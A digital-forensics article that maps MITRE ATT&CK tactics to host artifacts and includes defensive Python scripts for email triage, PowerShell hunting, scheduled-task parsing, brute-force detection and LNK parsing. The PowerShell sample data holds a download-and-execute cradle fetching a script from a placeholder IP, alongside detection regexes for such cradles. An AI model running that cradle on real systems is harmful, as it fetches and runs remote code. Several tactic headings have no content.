Artifacts and ATT&CK

A dive into the different types of artifacts to look for in line with the MITRE | ATT&CK framework.

What artifacts should we be looking for when carrying out forensic analysis on servers or hosts involved in an incident response engagement? Below we walk through the tactics of the ATT&CK framework, some of the main techniques used under each, and the artifacts we can look for to build a picture of what happened, when it happened and how the attack was carried out.

There are 14 tactics outlined in the ATT&CK framework, but I will be writing about the ones I find most useful for now and may add other phases at a later date. A further note: there are a number of techniques not covered here, as I am focusing on common techniques I have come across.

Initial Access

The adversary is trying to get into your network.

Phishing

Manually inspect emails with suspicious subjects, senders and attachments.

If the client uses Outlook, parse the PST file; otherwise identify the email client and the type of mailbox backup it uses, and parse that to examine the messages.
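The checks described above can be scripted once the mailbox has been exported. The following is an added example, not the author's own tooling: it reads a single RFC 5322 message (.eml) rather than a PST, on the assumption that the PST or other backup has already been parsed with the tooling for the client in question, and applies three indicators to it: a Reply-To domain that differs from the sender's, attachments with executable extensions, and links pointing outside the sender's domain. The message, the extension list and the scoring are constructed for illustration.

```python
"""Triage a mailbox export for phishing indicators.

Added example for this article, not the author's own tooling. It reads RFC 5322
messages (.eml) rather than a PST file: once the PST (or other backup) has been
parsed with the tooling for the client in question, the same checks apply to
each message. The message below is constructed for illustration.
"""
import email
import os
import re
from email import policy
from email.utils import parseaddr

# Attachment extensions that can run code and therefore warrant a closer look.
# The set is an illustrative assumption, not an exhaustive list.
RISKY_EXTENSIONS = {".exe", ".scr", ".js", ".vbs", ".hta", ".iso", ".lnk", ".docm", ".xlsm"}

# Constructed sample: sender domain, Reply-To domain and link host all differ.
SAMPLE_EML = b"""\
From: IT Helpdesk <helpdesk@example.com>
Reply-To: helpdesk@example-support.invalid
To: jane.doe@example.com
Subject: URGENT: password expires today
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain; charset="utf-8"

Your password expires today. Reset it at http://portal.example-support.invalid/reset
--b1
Content-Type: application/octet-stream; name="Reset_Tool.exe"
Content-Disposition: attachment; filename="Reset_Tool.exe"
Content-Transfer-Encoding: base64

Y29uc3RydWN0ZWQgc2FtcGxlIGRhdGE=
--b1--
"""


def _domain(addr: str) -> str:
    """Return the lower-cased domain part of an address, or '' if absent."""
    return addr.rpartition("@")[2].lower()


def triage_message(raw: bytes) -> dict:
    """Return the phishing indicators found in one RFC 5322 message."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    _, from_addr = parseaddr(str(msg.get("From", "")))
    _, reply_addr = parseaddr(str(msg.get("Reply-To", "")))
    sender_domain = _domain(from_addr)

    # Indicator 1: replies are steered to a different domain than the sender's.
    reply_to_mismatch = bool(reply_addr) and _domain(reply_addr) != sender_domain

    # Indicator 2: attachments whose extension can execute code.
    risky = [
        name
        for name in (part.get_filename() or "" for part in msg.iter_attachments())
        if os.path.splitext(name)[1].lower() in RISKY_EXTENSIONS
    ]

    # Indicator 3: links in the text body that point outside the sender's domain.
    body_part = msg.get_body(preferencelist=("plain",))
    body = body_part.get_content() if body_part is not None else ""
    hosts = re.findall(r"https?://([^/\s]+)", body)
    foreign_hosts = [
        h for h in hosts
        if not (h == sender_domain or h.endswith("." + sender_domain))
    ]

    return {
        "subject": str(msg.get("Subject", "")),
        "sender_domain": sender_domain,
        "reply_to_mismatch": reply_to_mismatch,
        "risky_attachments": risky,
        "links_outside_sender_domain": foreign_hosts,
        # One point per indicator hit; a simple way to rank a large export.
        "score": int(reply_to_mismatch) + len(risky) + len(foreign_hosts),
    }


if __name__ == "__main__":
    for key, value in triage_message(SAMPLE_EML).items():
        print(f"{key}: {value}")
```

Run against every message in an export and sort by score; the score is only a ranking aid, and the flagged messages still need the manual inspection the text describes.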

External Remote Services

Services such as RDP (Remote Desktop Protocol), SSH (Secure Shell) and SMB (Server Message Block), if externally exposed, can easily be identified by attackers through external reconnaissance and then targeted with brute-force or dictionary attacks, or with known credentials obtained through other means.

  • Windows Event Logs.

Execution

The adversary is trying to run malicious code.

Command and Scripting Interpreter

PowerShell on Windows devices is commonly used by attackers to carry out their objectives, such as downloading tools and enumerating the networks and accounts used within an environment. You can identify this activity with artifacts from the Windows Event Log such as:

  • Windows Event Logs.
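The two event sources that matter most here are PowerShell script block logging (Event ID 4104, field ScriptBlockText) and process creation with command-line auditing (Event ID 4688, field CommandLine). The following is an added example, not the author's own tooling: it assumes the events have already been exported to plain dictionaries and applies a few coarse behavioural patterns of the kind the text describes (download cradles, dynamic execution, encoded commands, quiet launch flags, account enumeration), decoding any -EncodedCommand payload so the analyst sees what actually ran. The records are constructed for illustration.

```python
"""Hunt for suspicious PowerShell activity in exported Windows event records.

Added example for this article, not the author's own tooling. It assumes the
relevant events have already been exported to simple dictionaries: Event ID 4104
(PowerShell script block logging, field ScriptBlockText) and Event ID 4688
(process creation with command-line auditing, field CommandLine). The records
below are constructed for illustration.
"""
import base64
import re

# Encoded commands are base64 over UTF-16LE text; this sample is a harmless one.
ENCODED = base64.b64encode("Write-Host 'constructed sample'".encode("utf-16-le")).decode()

SAMPLE_EVENTS = [
    {"EventID": 4104, "Computer": "WS01", "ScriptBlockText": "Get-ChildItem C:\\Users\\jane\\Documents"},
    {"EventID": 4104, "Computer": "WS01",
     "ScriptBlockText": "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/stage.ps1')"},
    {"EventID": 4688, "Computer": "WS01",
     "CommandLine": "powershell.exe -NoP -W Hidden -EncodedCommand " + ENCODED},
    {"EventID": 4104, "Computer": "WS01", "ScriptBlockText": "Get-ADUser -Filter * -Properties MemberOf"},
]

# Name -> pattern. Each pattern is a coarse behavioural indicator, not a verdict.
INDICATORS = [
    ("download_cradle", re.compile(
        r"Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Start-BitsTransfer", re.I)),
    ("dynamic_execution", re.compile(r"\bIEX\b|Invoke-Expression", re.I)),
    # -e / -enc / -EncodedCommand followed by a base64 token; group 1 is the token.
    ("encoded_command", re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{16,})", re.I)),
    ("quiet_launch_flags", re.compile(r"-w(?:indowstyle)?\s+hidden|-nop(?:rofile)?\b", re.I)),
    ("account_enumeration", re.compile(r"Get-ADUser|Get-LocalUser|Get-ADGroupMember|\bnet\s+user\b", re.I)),
]


def decode_encoded_command(token):
    """Recover the script passed via -EncodedCommand (base64 of UTF-16LE)."""
    try:
        return base64.b64decode(token, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_event(event):
    """Return the indicators matched by one 4104 or 4688 record."""
    text = event.get("ScriptBlockText") or event.get("CommandLine") or ""
    matches, decoded = [], None
    for name, pattern in INDICATORS:
        hit = pattern.search(text)
        if not hit:
            continue
        matches.append(name)
        if name == "encoded_command":
            decoded = decode_encoded_command(hit.group(1))
    return {
        "EventID": event["EventID"],
        "Computer": event.get("Computer"),
        "matches": matches,
        "decoded_command": decoded,
        "text": text,
    }


def hunt(events):
    """Keep only the records that matched at least one indicator."""
    return [finding for finding in map(analyze_event, events) if finding["matches"]]


if __name__ == "__main__":
    for finding in hunt(SAMPLE_EVENTS):
        print(finding["EventID"], finding["matches"], finding["decoded_command"] or finding["text"])
```

Script block logging records the decoded script even when the launcher was encoded, so 4104 and 4688 should be correlated by time and host rather than treated as separate findings.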

Scheduled Task/Job

  • Windows Event Logs.
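When task creation auditing is enabled, Event ID 4698 ("A scheduled task was created") carries the full task definition as escaped XML in its TaskContent field, which is where the trigger, the account the task runs as and the command it executes are found. The following is an added example, not the author's own tooling: it parses one such event as exported to XML, pulls those fields out of the embedded task definition, and flags an executable located outside the Windows and Program Files directories. The event is constructed for illustration; the list of trusted path prefixes is an assumption.

```python
"""Extract what a newly created scheduled task does from a 4698 event.

Added example for this article, not the author's own tooling. The event below is
constructed in the shape of an exported Windows event (System + EventData), with
the task definition embedded as escaped XML in the TaskContent field.
"""
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

EVT_NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
# Directories a task's executable is normally expected to live in (assumption).
SYSTEM_PREFIXES = ("c:\\windows\\", "c:\\program files", "%systemroot%", "%programfiles%", "%windir%")

# Constructed task definition: runs at logon as SYSTEM from a user-writable path.
TASK_XML = (
    '<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">'
    "<Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>"
    '<Principals><Principal id="Author"><UserId>S-1-5-18</UserId>'
    "<RunLevel>HighestAvailable</RunLevel></Principal></Principals>"
    '<Actions Context="Author"><Exec><Command>C:\\Users\\Public\\update.exe</Command>'
    "<Arguments>-q</Arguments></Exec></Actions></Task>"
)

SAMPLE_EVENT_XML = f"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <EventID>4698</EventID>
    <TimeCreated SystemTime="2024-05-02T01:15:03.123456Z"/>
    <Computer>WS01.example.local</Computer>
  </System>
  <EventData>
    <Data Name="SubjectUserName">jane</Data>
    <Data Name="SubjectDomainName">EXAMPLE</Data>
    <Data Name="TaskName">\\Microsoft\\Windows\\Updater</Data>
    <Data Name="TaskContent">{escape(TASK_XML)}</Data>
  </EventData>
</Event>"""


def _text(elem, path, ns):
    """Text of the first element at path, or '' when absent."""
    node = elem.find(path, ns)
    return node.text if node is not None and node.text is not None else ""


def parse_task_creation_event(event_xml):
    """Return who created which task, what it runs, as whom, and when it fires."""
    root = ET.fromstring(event_xml)
    if _text(root, "e:System/e:EventID", EVT_NS) != "4698":
        raise ValueError("not a 4698 (scheduled task created) event")
    data = {d.get("Name"): (d.text or "") for d in root.findall("e:EventData/e:Data", EVT_NS)}

    # ElementTree has already unescaped TaskContent, so it parses as XML directly.
    task = ET.fromstring(data["TaskContent"])
    triggers_node = task.find("t:Triggers", TASK_NS)
    triggers = [child.tag.split("}")[-1] for child in triggers_node] if triggers_node is not None else []
    command = _text(task, "t:Actions/t:Exec/t:Command", TASK_NS)

    return {
        "time": root.find("e:System/e:TimeCreated", EVT_NS).get("SystemTime"),
        "computer": _text(root, "e:System/e:Computer", EVT_NS),
        "created_by": f"{data.get('SubjectDomainName', '')}\\{data.get('SubjectUserName', '')}",
        "task_name": data.get("TaskName", ""),
        "run_as": _text(task, "t:Principals/t:Principal/t:UserId", TASK_NS),
        "run_level": _text(task, "t:Principals/t:Principal/t:RunLevel", TASK_NS),
        "triggers": triggers,
        "command": command,
        "arguments": _text(task, "t:Actions/t:Exec/t:Arguments", TASK_NS),
        "executable_outside_system_paths": bool(command) and not command.lower().startswith(SYSTEM_PREFIXES),
    }


if __name__ == "__main__":
    for key, value in parse_task_creation_event(SAMPLE_EVENT_XML).items():
        print(f"{key}: {value}")
```

A task name under \Microsoft\Windows\ created by an ordinary user account, running as SYSTEM from a user-writable directory, is the combination worth pulling into the timeline; the same fields are also useful for reviewing the on-disk task files under C:\Windows\System32\Tasks when the event log has rolled over.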

Persistence

The adversary is trying to maintain their foothold.

Create or Modify System Process

  • Identify processes created or modified on disk within the incident timeline (the name may differ slightly from the original in an attempt to mirror a legitimate process name, e.g. scvhost.exe instead of svchost.exe).
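Two checks cover the masquerading described above: a name that is close to, but not identical with, a legitimate Windows binary, and a genuine name running from the wrong directory. The following is an added example, not the author's own tooling: it scores name similarity with an edit distance and compares each path against a baseline of expected directories. The baseline here is a small illustrative assumption (in an engagement it would come from a known-good image of the same build) and the observed process list is constructed for illustration.

```python
"""Flag processes whose names or on-disk locations masquerade as Windows binaries.

Added example for this article, not the author's own tooling. The baseline of
legitimate names and the directory each should live in is a small illustrative
assumption; in an engagement it would come from a known-good image of the same
build. The observed process list below is constructed for illustration.
"""
import ntpath

# name -> directory where the genuine binary lives (lower-case for comparison)
BASELINE = {
    "svchost.exe": r"c:\windows\system32",
    "lsass.exe": r"c:\windows\system32",
    "csrss.exe": r"c:\windows\system32",
    "winlogon.exe": r"c:\windows\system32",
    "services.exe": r"c:\windows\system32",
    "smss.exe": r"c:\windows\system32",
    "wininit.exe": r"c:\windows\system32",
    "explorer.exe": r"c:\windows",
}
MAX_EDIT_DISTANCE = 2  # scvhost.exe vs svchost.exe is 2 edits apart

# Constructed (name, full path) pairs as they might come from a process listing,
# Prefetch or Amcache review.
SAMPLE_PROCESSES = [
    ("svchost.exe", r"C:\Windows\System32\svchost.exe"),
    ("scvhost.exe", r"C:\Users\Public\scvhost.exe"),
    ("svchost.exe", r"C:\Users\jane\AppData\Local\Temp\svchost.exe"),
    ("explorer.exe", r"C:\Windows\explorer.exe"),
    ("chrome.exe", r"C:\Program Files\Google\Chrome\Application\chrome.exe"),
    ("lsass.exe", r"C:\Windows\System32\lsass.exe"),
]


def edit_distance(a, b):
    """Levenshtein distance between two strings (insert/delete/substitute)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def review_processes(observed):
    """Return the processes that look like masquerades, with the reason."""
    findings = []
    for name, path in observed:
        lname, directory = name.lower(), ntpath.dirname(path).lower()
        if lname in BASELINE:
            # Genuine name: the only question is whether it runs from the right place.
            if directory != BASELINE[lname]:
                findings.append({"name": name, "path": path, "reason": "unexpected_path",
                                 "expected_dir": BASELINE[lname]})
            continue
        # Unknown name: is it a near miss for something legitimate?
        closest = min(BASELINE, key=lambda legit: edit_distance(lname, legit))
        distance = edit_distance(lname, closest)
        if distance <= MAX_EDIT_DISTANCE:
            findings.append({"name": name, "path": path, "reason": "lookalike_name",
                             "closest": closest, "distance": distance})
    return findings


if __name__ == "__main__":
    for finding in review_processes(SAMPLE_PROCESSES):
        print(finding)
```

Names already in the baseline are deliberately not compared with each other (csrss.exe and smss.exe are themselves only two edits apart), which keeps the lookalike check from flagging legitimate system processes.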

BITS Jobs

  • Windows Event Logs.

Privilege Escalation

The adversary is trying to gain higher-level permissions.

Process Injection

  • Use the Volatility framework, if a RAM capture is available, with its plugins for detecting process injection.

Defense Evasion

The adversary is trying to avoid being detected.

Group Policy Modification

Credential Access

The adversary is trying to steal account names and passwords.

Brute Force

  • Windows Event Logs.
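For both the externally exposed services discussed under Initial Access and the Brute Force technique here, the relevant Windows Event Log records are 4625 (failed logon) and 4624 (successful logon), with the source address and logon type (3 for network logons such as SMB, 10 for RemoteInteractive, i.e. RDP) in the event data. The following is an added example, not the author's own tooling: it assumes the events have been exported to dictionaries, finds any source address with a burst of failures inside a short window, and reports whether a successful logon from the same address followed. The records, threshold and window are constructed for illustration.

```python
"""Detect password-guessing bursts in exported 4625/4624 logon events.

Added example for this article, not the author's own tooling. It assumes the
events have been exported to dictionaries carrying TimeCreated, EventID,
TargetUserName, IpAddress and LogonType. Records, threshold and window below are
constructed for illustration.
"""
from collections import defaultdict
from datetime import datetime, timedelta

THRESHOLD = 5                       # failures within WINDOW that trigger an alert
WINDOW = timedelta(minutes=2)
LOGON_TYPES = {3: "Network (e.g. SMB)", 10: "RemoteInteractive (RDP)"}

SAMPLE_EVENTS = [
    # Two mistyped passwords from an internal workstation: background noise.
    {"TimeCreated": "2024-05-02T01:05:10", "EventID": 4625, "TargetUserName": "jdoe", "IpAddress": "10.0.0.5", "LogonType": 3},
    {"TimeCreated": "2024-05-02T01:06:02", "EventID": 4625, "TargetUserName": "jdoe", "IpAddress": "10.0.0.5", "LogonType": 3},
    # A burst of failures against several accounts from one external address...
    {"TimeCreated": "2024-05-02T01:10:00", "EventID": 4625, "TargetUserName": "administrator", "IpAddress": "198.51.100.23", "LogonType": 10},
    {"TimeCreated": "2024-05-02T01:10:12", "EventID": 4625, "TargetUserName": "admin", "IpAddress": "198.51.100.23", "LogonType": 10},
    {"TimeCreated": "2024-05-02T01:10:25", "EventID": 4625, "TargetUserName": "backup", "IpAddress": "198.51.100.23", "LogonType": 10},
    {"TimeCreated": "2024-05-02T01:10:40", "EventID": 4625, "TargetUserName": "svc_backup", "IpAddress": "198.51.100.23", "LogonType": 10},
    {"TimeCreated": "2024-05-02T01:10:58", "EventID": 4625, "TargetUserName": "jsmith", "IpAddress": "198.51.100.23", "LogonType": 10},
    {"TimeCreated": "2024-05-02T01:11:20", "EventID": 4625, "TargetUserName": "test", "IpAddress": "198.51.100.23", "LogonType": 10},
    # ...followed by a successful RDP logon from the same address.
    {"TimeCreated": "2024-05-02T01:11:45", "EventID": 4624, "TargetUserName": "svc_backup", "IpAddress": "198.51.100.23", "LogonType": 10},
]


def detect_bruteforce(events, threshold=THRESHOLD, window=WINDOW):
    """Return one alert per source address whose failures exceed threshold within window."""
    by_ip = defaultdict(lambda: {"fail": [], "success": []})
    for event in sorted(events, key=lambda e: e["TimeCreated"]):
        ts = datetime.fromisoformat(event["TimeCreated"])
        if event["EventID"] == 4625:
            by_ip[event["IpAddress"]]["fail"].append((ts, event))
        elif event["EventID"] == 4624:
            by_ip[event["IpAddress"]]["success"].append((ts, event))

    alerts = []
    for ip, buckets in by_ip.items():
        fails = buckets["fail"]
        # Sliding window over the sorted failures: find the densest burst.
        start, best = 0, (0, 0, 0)          # (count, start_idx, end_idx)
        for end in range(len(fails)):
            while fails[end][0] - fails[start][0] > window:
                start += 1
            if end - start + 1 > best[0]:
                best = (end - start + 1, start, end)
        if best[0] < threshold:
            continue
        burst = fails[best[1]:best[2] + 1]
        burst_start = burst[0][0]
        later_success = [e for ts, e in buckets["success"] if ts >= burst_start]
        alerts.append({
            "ip": ip,
            "failed_attempts": len(burst),
            "usernames": sorted({e["TargetUserName"] for _, e in burst}),
            "logon_types": sorted({LOGON_TYPES.get(e["LogonType"], str(e["LogonType"])) for _, e in burst}),
            "first_failure": burst_start.isoformat(),
            "last_failure": burst[-1][0].isoformat(),
            "success_after_failures": bool(later_success),
            "successful_accounts": sorted({e["TargetUserName"] for e in later_success}),
        })
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_EVENTS):
        print(alert)
```

The success-after-failures flag is what turns a noisy brute-force alert into an Initial Access finding: the account listed under successful_accounts and its subsequent activity become the next pivot in the timeline.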

Discovery

The adversary is trying to figure out your environment.

Account Discovery

File and Directory Discovery

  • Shell Bags.

  • LNK Files.

  • Jump Lists.
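LNK files (and the entries inside Jump Lists, which embed the same structure) record the target's own creation, access and write times and size at the moment the link was made, along with the relative path and working directory, which is why they show what a user or attacker opened even after the target has been deleted. The following is an added example, not the author's own tooling: a parser for the MS-SHLLINK header and StringData fields, with the optional LinkTargetIDList and LinkInfo sections skipped by their size fields. No real file is read; the sample link is constructed in build_sample_lnk().

```python
"""Parse the header and string data of a Windows shell link (.lnk) file.

Added example for this article, not the author's own tooling. It follows the
MS-SHLLINK layout: a 76-byte ShellLinkHeader (with the target's FILETIME
creation/access/write times and size), an optional LinkTargetIDList and
LinkInfo (skipped here by their size fields), then the StringData fields.
The sample link is constructed in build_sample_lnk(); no real file is read.
"""
import struct
from datetime import datetime, timedelta, timezone

HEADER_FMT = "<I16sIIQQQIIIHHII"     # HeaderSize .. Reserved3, little-endian
HEADER_SIZE = 0x4C
# {00021401-0000-0000-C000-000000000046} as stored on disk
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")

# LinkFlags bits that affect parsing.
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, IS_UNICODE = 0x01, 0x02, 0x80
STRING_FIELDS = [   # (flag bit, field name) in the order StringData is written
    (0x04, "name"),
    (0x08, "relative_path"),
    (0x10, "working_dir"),
    (0x20, "arguments"),
    (0x40, "icon_location"),
]

FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def filetime_to_datetime(ft):
    """FILETIME is 100-ns ticks since 1601-01-01 UTC; 0 means 'not set'."""
    return None if ft == 0 else FILETIME_EPOCH + timedelta(microseconds=ft // 10)


def datetime_to_filetime(dt):
    """Inverse of filetime_to_datetime, exact for microsecond-resolution input."""
    delta = dt - FILETIME_EPOCH
    return (delta.days * 86400 + delta.seconds) * 10_000_000 + delta.microseconds * 10


def parse_lnk(data):
    """Return the target metadata and string fields recorded in a .lnk blob."""
    (hdr_size, clsid, flags, attrs, ctime, atime, wtime, size,
     _icon, show_cmd, _hotkey, _r1, _r2, _r3) = struct.unpack_from(HEADER_FMT, data, 0)
    if hdr_size != HEADER_SIZE or clsid != LNK_CLSID:
        raise ValueError("not a shell link file")

    off = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:           # IDListSize (u16) then the list
        (idlist_size,) = struct.unpack_from("<H", data, off)
        off += 2 + idlist_size
    if flags & HAS_LINK_INFO:                     # LinkInfoSize (u32) includes itself
        (info_size,) = struct.unpack_from("<I", data, off)
        off += info_size

    info = {
        "flags": flags,
        "file_attributes": attrs,
        "target_created": filetime_to_datetime(ctime),
        "target_accessed": filetime_to_datetime(atime),
        "target_written": filetime_to_datetime(wtime),
        "target_size": size,
        "show_command": show_cmd,
    }
    # StringData: CountCharacters (u16) followed by that many UTF-16LE or ANSI chars.
    for bit, key in STRING_FIELDS:
        if not flags & bit:
            continue
        (count,) = struct.unpack_from("<H", data, off)
        off += 2
        if flags & IS_UNICODE:
            info[key] = data[off:off + count * 2].decode("utf-16-le")
            off += count * 2
        else:
            info[key] = data[off:off + count].decode("cp1252")
            off += count
    return info


def _string_data(text):
    return struct.pack("<H", len(text)) + text.encode("utf-16-le")


def build_sample_lnk():
    """Constructed .lnk: Unicode strings, no IDList/LinkInfo, archive attribute."""
    flags = 0x04 | 0x08 | 0x10 | IS_UNICODE
    header = struct.pack(
        HEADER_FMT, HEADER_SIZE, LNK_CLSID, flags, 0x20,
        datetime_to_filetime(datetime(2021, 3, 15, 12, 0, tzinfo=timezone.utc)),
        datetime_to_filetime(datetime(2021, 4, 1, 9, 30, tzinfo=timezone.utc)),
        datetime_to_filetime(datetime(2021, 3, 20, 8, 15, tzinfo=timezone.utc)),
        1024, 0, 1, 0, 0, 0, 0)
    return (header + _string_data("Budget spreadsheet")
            + _string_data("..\\Documents\\budget.xlsx")
            + _string_data("C:\\Users\\jane\\Documents"))


if __name__ == "__main__":
    for key, value in parse_lnk(build_sample_lnk()).items():
        print(f"{key}: {value}")
```

The timestamps recovered here belong to the target, not to the link file itself; comparing them with the LNK's own filesystem timestamps gives the time of first and last access to the target, which is the point of collecting these artifacts for the timeline.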

Lateral Movement

The adversary is trying to move through your environment.

Remote Services

Collection

The adversary is trying to gather data of interest to their goal.

Data from Local System

Data from Network Shared Drive

Email Collection

Command and Control

The adversary is trying to communicate with compromised systems to control them.

Data Encoding

Non-Standard Port

  • Windows Event Logs.

Exfiltration

The adversary is trying to steal data.

Automated Exfiltration